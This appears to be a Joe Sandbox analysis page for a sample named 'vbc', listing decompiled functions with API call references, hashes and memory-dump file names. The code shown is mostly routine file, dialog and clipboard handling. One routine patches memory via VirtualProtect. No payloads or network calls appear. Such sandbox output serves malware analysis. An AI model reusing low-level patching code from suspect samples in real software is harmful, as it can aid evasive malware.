Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768

Uniqueness

Uniqueness Score: -1.00%

Function 00405E6A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E6A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e6e
0x00405e7e
0x00405e86
0x00000000
0x00405e8d
0x00000000
0x00405e8f

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000), ref: 00405E7E

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405E99 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E99(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e9d
0x00405ead
0x00405eb5
0x00000000
0x00405ebc
0x00000000
0x00405ebe

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000), ref: 00405EAD

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}

0x100027d0
0x100027d5
0x100027e5
0x100027ed
0x100027f4
0x100027f9
0x100027fe
0x10002803
0x10002808
0x1000280d
0x10002812
0x10002812
0x1000281a

APIs

VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040234E(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402C53(1);
				 *(_t21 - 0x50) = E00402C53(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x50), _t21 + 8, _t19, 0x3ff, E00402C53(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x0040234e
0x00402355
0x00402358
0x00402368
0x0040237f
0x00402385
0x00401751
0x0040286f
0x00402876
0x00402876
0x00402ade
0x00402aea

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C53(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x004028a1
0x004028a1
0x00402ade
0x00402aea

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9ff7721e1f69ebac7603c38c99d10499fff0838f18fff7d5bc70e8c3971da3d6
Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
Opcode Fuzzy Hash: 9ff7721e1f69ebac7603c38c99d10499fff0838f18fff7d5bc70e8c3971da3d6
Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29

Uniqueness

Uniqueness Score: -1.00%

Function 004014F5 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014F5() {
				void* _t9;

				SetForegroundWindow( *(_t9 - 8)); // executed
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t9 - 4));
				return 0;
			}

0x004014f8
0x00402ade
0x00402aea

APIs

KiUserCallbackDispatcher.NTDLL(?), ref: 004014F8

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: fbc8e3c7f51d7818c3e9ebe12f5ecc36ed6e5fe01e7d03bf71c6e79a5fdedc58
Instruction ID: 8ad9bd603bb4c2cb2292177aa9721f3da77c144169ebace510bf6b741a112718
Opcode Fuzzy Hash: fbc8e3c7f51d7818c3e9ebe12f5ecc36ed6e5fe01e7d03bf71c6e79a5fdedc58
Instruction Fuzzy Hash: 76C08C33700004CBC700CBA8FA8448CB7B1EB4032972184B7C203E1070D77189A29B28

Uniqueness

Uniqueness Score: -1.00%

Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403402(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403410
0x00403416

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040430B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00404319
0x0040431f

APIs

SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000005.00000002.1187096377.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.1187091951.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187101005.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1187106210.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_vbc.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004054B0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405444, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406234(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2cc == _t156) {
								E00405371( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
							}
							E004042AF(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E004042AF(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433D(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E0040430B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a250;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E0040430B( *0x429210);
				 *0x429214 = E00404C0E(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D6(_a4);
				if(( *0x42a258 & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156);
					if(( *0x42a258 & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040430B( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a258 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004054b8
0x004054be
0x004054c8
0x004054cb
0x00405661
0x00405685
0x00405685
0x00405698
0x004056b6
0x004056b8
0x004056c0
0x00405716
0x0040571a
0x00000000
0x00000000
0x0040571c
0x00405722
0x00000000
0x00000000
0x0040572c
0x00405734
0x00405737
0x00405839
0x00000000
0x00405839
0x00405746
0x00405751
0x0040575a
0x00405765
0x00405768
0x00405771
0x00405777
0x0040577a
0x0040577a
0x00405792
0x0040579b
0x0040579e
0x004057a5
0x004057ac
0x004057b4
0x004057b4
0x004057cb
0x004057cb
0x004057d2
0x004057d8
0x004057e4
0x004057eb
0x004057f4
0x004057f6
0x004057f9
0x00405808
0x0040580b
0x00405811
0x00405812
0x00405818
0x00405819
0x0040581a
0x00405822
0x0040582d
0x00405833
0x00405833
0x00000000
0x00405792
0x004056c8
0x004056f8
0x00405700
0x0040570b
0x0040570b
0x00405711
0x00000000
0x00405711
0x004056cc
0x004056d6
0x00000000
0x0040569a
0x004056a0
0x004056db
0x00000000
0x004056e4
0x004056a9
0x004056ae
0x004056b1
0x00000000
0x004056b1
0x00405698
0x004054d1
0x004054d5
0x004054dd
0x004054e1
0x004054e4
0x004054e7
0x004054ea
0x004054ed
0x004054ee
0x004054ef
0x00405508
0x0040550b
0x00405515
0x00405524
0x0040552c
0x00405534
0x00405539
0x0040553c
0x00405548
0x00405551
0x0040555a
0x0040557c
0x00405582
0x00405593
0x00405598
0x004055a6
0x004055b4
0x004055b4
0x004055b9
0x004055c7
0x004055c7
0x004055cc
0x004055cf
0x004055d4
0x004055e0
0x004055e9
0x004055f6
0x00405605
0x004055f8
0x004055fd
0x004055fd
0x00405611
0x00405611
0x00405625
0x0040562e
0x00405637
0x00405647
0x00405653
0x00405653
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040550E
GetDlgItem.USER32(?,000003EE), ref: 0040551D
GetClientRect.USER32 ref: 0040555A
GetSystemMetrics.USER32 ref: 00405561
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
ShowWindow.USER32(00000000,?), ref: 004055E9
ShowWindow.USER32(?,00000008), ref: 004055FD
GetDlgItem.USER32(?,000003EC), ref: 0040561E
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
GetDlgItem.USER32(?,000003F8), ref: 0040552C

Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319

GetDlgItem.USER32(?,000003EC), ref: 00405670
CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
CloseHandle.KERNEL32(00000000), ref: 00405685
ShowWindow.USER32(00000000), ref: 004056A9
ShowWindow.USER32(?,00000008), ref: 004056AE
ShowWindow.USER32(00000008), ref: 004056F8
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
CreatePopupMenu.USER32 ref: 0040573D
AppendMenuW.USER32 ref: 00405751
GetWindowRect.USER32(?,?), ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
OpenClipboard.USER32(00000000), ref: 004057D2
EmptyClipboard.USER32 ref: 004057D8
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
GlobalLock.KERNEL32 ref: 004057EE
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
GlobalUnlock.KERNEL32(00000000), ref: 00405822
SetClipboardData.USER32 ref: 0040582D
CloseClipboard.USER32 ref: 00405833

Strings

(7B, xrefs: 0040579E
{, xrefs: 00405716

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
